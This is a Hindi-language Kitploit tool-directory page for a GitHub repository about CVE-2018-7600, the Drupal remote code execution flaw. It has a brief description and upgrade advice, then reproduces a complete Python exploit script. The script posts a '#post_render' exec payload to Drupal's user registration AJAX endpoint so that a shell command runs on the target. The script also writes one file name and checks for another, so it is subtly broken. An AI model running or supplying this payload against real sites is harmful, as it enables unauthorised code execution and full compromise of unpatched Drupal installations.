Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2018-7600. — CVE-2018-7600. | Kitploit
उपकरण/GitHubGitHub/tpdlshdmlrkfmcla/cve-2018-7600.
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubtpdlshdmlrkfmcla/cve-2018-7600.

CVE-2018-7600.

CVE-2018-7600.

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

IGLOO Corp, Won Chi Hyun Drupal RCE विश्लेषण रिपोर्ट

Drupal RCE CVE-2018-7600

अपने पते को स्क्रिप्ट में डालना न भूलें! विवरण: एक रिमोट कोड निष्पादन भेद्यता Drupal 7.x और 8.x के कई उप-प्रणालियों में मौजूद है। यह संभावित रूप से हमलावरों को Drupal साइट पर कई आक्रमण वैक्टरों का शोषण करने की अनुमति देता है, जिसके परिणामस्वरूप साइट पूरी तरह से समझौता हो सकती है।

समाधान: Drupal 7 या 8 कोर के नवीनतम संस्करण में अपग्रेड करें।

यदि आप 7.x चला रहे हैं, तो Drupal 7.58 में अपग्रेड करें। (यदि आप तुरंत अपडेट करने में असमर्थ हैं, तो आप जब तक पूरी तरह से अपडेट करने में सक्षम नहीं हो जाते, तब तक भेद्यता को ठीक करने के लिए इस पैच को लागू करने का प्रयास कर सकते हैं।) यदि आप 8.5.x चला रहे हैं, तो Drupal 8.5.1 में अपग्रेड करें। (यदि आप तुरंत अपडेट करने में असमर्थ हैं, तो आप जब तक पूरी तरह से अपडेट करने में सक्षम नहीं हो जाते, तब तक भेद्यता को ठीक करने के लिए इस पैच को लागू करने का प्रयास कर सकते हैं।)

root@kitploit:~
#!/usr/bin/python2.7
'''_____________________________________________________________________
|[] R3DXPL0IT SHELL                                            |ROOT]|!"|
|"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""|"| 
|CODED BY > R3DXPLOIT(JIMMY)                                          | |
|EMAIL > [email protected]                                   | |
|GITHUB > https://github.com/r3dxpl0it                                | |
|WEB-PAGE > https://r3dxpl0it.Github.io                               |_|
|_____________________________________________________________________|/|
'''
'''
https://nvd.nist.gov/vuln/detail/CVE-2018-7600#
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600
'''
import sys
import requests

def exploit(target):
    pass
    proxies = {}
    verify = False

    payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "vulnerable to cve-7600-2018 exploit" | tee r3dxploit.txt'}
    url = target + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    print ( '[*]' + ' requesting post')
    r = requests.post(url, proxies=proxies, data=payload, verify=verify)
    try:
        scan = requests.get(target + 'vulnerable.txt')
        if scan.status_code != 200:
           print ( ' not vulnerable to cve-2018-7600 exploit \n')
        if scan.status_code == 200:
           print (' vulnerable to cve-2018-7600 exploit')
           print (' url: ' + target + 'vulnerable.txt \n')
    except requests.ConnectionError:
        print (' target connection timeout')
    except Exception as e :
        print ('Connction Failed ' + e )
				

if __name__ == '__main__':
   exploit(sys.argv[1])
टूल डाउनलोड करें

कोड विश्लेषण।

main -> exploit

argv[1] -target argument scan. status_code कोड स्थिति मान के अनुसार परिणाम मान निकालना इवेंट अपवाद प्रबंधन